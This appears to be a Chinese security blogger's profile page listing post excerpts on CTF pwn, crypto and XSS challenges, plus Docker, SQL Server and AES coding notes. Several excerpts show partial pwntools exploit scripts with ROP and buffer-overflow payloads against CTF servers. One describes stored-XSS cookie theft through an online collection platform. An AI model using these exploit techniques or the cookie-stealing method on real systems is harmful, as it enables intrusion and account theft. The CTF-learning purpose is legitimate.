- 博客(18)
- 资源 (2)
- 收藏
- 关注
原创 密码学学习-Hackergame2021 Easy RSA
密码学学习1、Hackergame2021 Easy RSA题目如下import mathimport sympyfrom Crypto.Util.number import *e = 65537def get_p(): x = 1112444002174812715909207686140545481498157514474450885717857657292932143500294299853142098577109016726225687780590213530411227
2023-04-11 10:48:07 394
原创 BUU XSS COURSE 1 wp XSS平台在线注册
具体原理就是相当于我们将我们的木马放到这个网站上了,当别人访问这个网站,我们的木马就会窃取他的cookie等相关信息。那么我们应该如何搭建自己的"木马服务器"呢,这里其实网上都有教程,不过需要内网穿透,而我们老白嫖怪了,网上有个免费的在线xss测试平台,这里把链接放出来。这里就提到一个重点了,自己的XSS平台,这个东西兄弟们可以理解为一个远程木马服务器,如果有访问,我们的服务器上就会获取他的信息。则判断存在注入点,XSS注入攻击是一个很大的类,这里我仅从这题出手,这题目是存储型XSS,相关知识自行搜索。
2023-04-11 10:38:01 1476 2
原创 从一次发生在身边的网络攻击事件中学习蓝军溯源知识。
我的一个好朋友的服务器前些日子被国外黑客组织攻击了,真人真事,不过正好我们学是安全的,这不得给他多少整个溯源反制,我的好兄弟在反制结束后,写了一篇博客,以此我也跟着学习了一些蓝军溯源知识。希望分享给大家。
2022-11-07 19:17:22 832 1
原创 Cannot connect to the Docker daemon at unix:///var/run/docker.sock. docker安装后启动失败
Using default tag: latestCannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?docker启动失败docker拉去镜像失败
2022-06-12 18:46:33 131
原创 python连接Windows身份验证 SQL Server
Windows 身份验证登录只需要2个参数import pymssqldef connect(): conn = pymssql.connect(server='localhost', database='CourseSchedule') return conn#server='localhost' database='[你要连接的数据库名字]'即可
2022-05-05 08:19:30 3654 2
原创 CTFshow-36D杯-pwn-babyheap
参考博客https://www.xl-bit.cn/index.php/archives/15/再找wp的时候找了好久,终于找到该师傅的exp,希望后来人能有wp看。不过可能该师傅的博客解码有点问题,导致他的exp不能直接跑通。这里做了整理。代码如下:2022.4.11 证明可以跑通from pwn import *def new(content): p.sendlineafter('>>','1') p.sendafter('your 36D:',content)def fre
2022-04-11 22:18:08 753
原创 解题脚本 ctfshow 摆烂杯 crypto 密码题 春哥VS曾哥
官方wp看懂原理写出来很简单,那就直接贴脚本了from pwn import *p=remote('pwn.challenge.ctf.show',28079)def pwn(): z=p.recvuntil(']\n') a=str(p.recvline()) b=a.find('= (') c=a.find(',',9) d=int(a[b+3:c])#x e=int(a[c+2:-4])#y if(d>=e): p.
2021-12-31 10:37:20 596
原创 CTFshow 摆烂杯 pwn
CTFshow 摆烂杯 pwn啊啊啊,看着官方脚本调了好久终于调通,为了防止后来的兄弟耽误时间,发个博客。官方wpdota这道题还是很简单的,整型溢出+格式化字符串+ROP,可惜当时只做出这一道题#!/usr/bin/env python# encoding: utf-8from pwn import*from LibcSearcher import *context.log_level = "debug"p = remote('pwn.challenge.ctf.show',2818
2021-12-27 09:58:12 3178 1
原创 [BUUCTF]PWN——others_babystack
一次通,很开心。直接放脚本from pwn import *context.log_level='debug'p = remote('node4.buuoj.cn',26890)elf = ELF('./babystack')puts_plt=elf.plt['puts']puts_got=elf.got['puts']main=0x400908pop_rdi=0x00400a93p.recvuntil('>>')p.sendline('1')payload='a'*136
2021-12-15 21:19:41 2756
原创 AES C语言实现
AES C语言实现1.圈密钥生成函数//1、圈密钥生成函数void ScheduleKey(unsigned char *inkey,unsigned char *outkey,int Nk,int Nr){ unsigned char temp[4],t; int x,i; for(i=0;i<(4*Nk);i++) { outkey[i]=inkey[i]; } i=Nk; while(i<(4*(Nr+1))) { for(x=0;x<4;x+
2021-12-13 18:11:09 1541
原创 ctfshow 内部赛 pwn 签到题
ctfshow 内部赛 pwn 签到题找了在刷题的中,不会做这道题,找了好久没找到wp,搞了几天,还怀疑题目出错了,结果一看有最近13天前做出来的,又认真在搞。最终搞出来了,原来是csu,不想让后来人向我一样没有wp可以看,解出来马上就写了博客hhhh。先放图片,2021.11.16该代码可行这个我找了好久。都没找到wp,但是我看到了一个人的博客,无意间发现他的题目似乎与这道题一样,于是尝试求解,解出,在这里感谢下作者。这里 作者是偏有宸机,他那里有更好的解释。Ret2libc_64[csu及get
2021-11-16 13:13:50 1720 1
原创 NSSCTF 我flag呢? wp misc
词频统计from collections import Counterimport rec = ''with open('D:/桌面/CTF竞赛文件夹/NSS/我flag呢?','r') as f: for i in f: hh=ipattern = re.compile('{(.*?)}', re.S)items = re.findall(pattern, hh)print(items)for i in items: c+=iaa=Counter(c.l
2021-10-15 06:41:12 534
原创 汇编语言猜数字
汇编语言编写猜数字游戏(无随机)一个猜数字的游戏,首先由玩家一输入一个数字,然后玩家二去猜玩家一的数字,范围是0-9的数字,在作业中写的,因为当时没找到代码,所以想发出来给后来者(尽管很菜)data SEGMENT mess1 db "Input a number(0-9):$" mess2 db "Guess a number haha:$" mess3 db "Too big,too big$";数据端 mess4 db "Are you small?$" mess5 db "Congra
2021-06-18 21:21:41 408 1
原创 2021强网杯ezmath
强网杯ezmath wp学习复现前言过程思路1思路2总结前言博主是渣渣,通过写文章来分析与学习,最近参加强网杯,比较菜,打完之后学习复习一下,感谢来自https://www.yuque.com/fosusec/writeup/2021qwb#aldCs的wp,NU1L战队的wp,来自https://cdcq.github.io/2021/06/15/20210615a/的wp。过程拿到附件,放到die里面看下正常类型。无壳,64位,ELF文件放到64位IDA中进行查看。main函数如下
2021-06-18 21:08:54 508
原创 最初的最初
文章目录说在前面的话我现在的水平生活情况学习水平现在已有的二级制能力说在中间的话说在最后的话说在前面的话今天了解到很多东西,也打算成为一个真正进步的人,有着星辰般的理想与野心,也希望脚踏实地的学一些东西,因此给大家分享,这是你们前辈(bushi)当时学习CTF的一些想法,不知道以后会有谁看到这些话吧,反正我现在菜的一匹,但是多强的人都是从一个个菜开始的,当时我是看着前辈们的建议成长起来的,因此我也希望后辈们能学到一些的东西,就是这样一辈辈传承下去的,黑客精神吧。分享是一个很重要的品质,因此我希望能够从一
2021-05-23 22:01:32 139 2
搭建IIS,FTP服务所缺少的I386文件
2022-11-01
python 更改win10本机安全策略,本机策略,账号策略,审核策略
2022-10-12
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人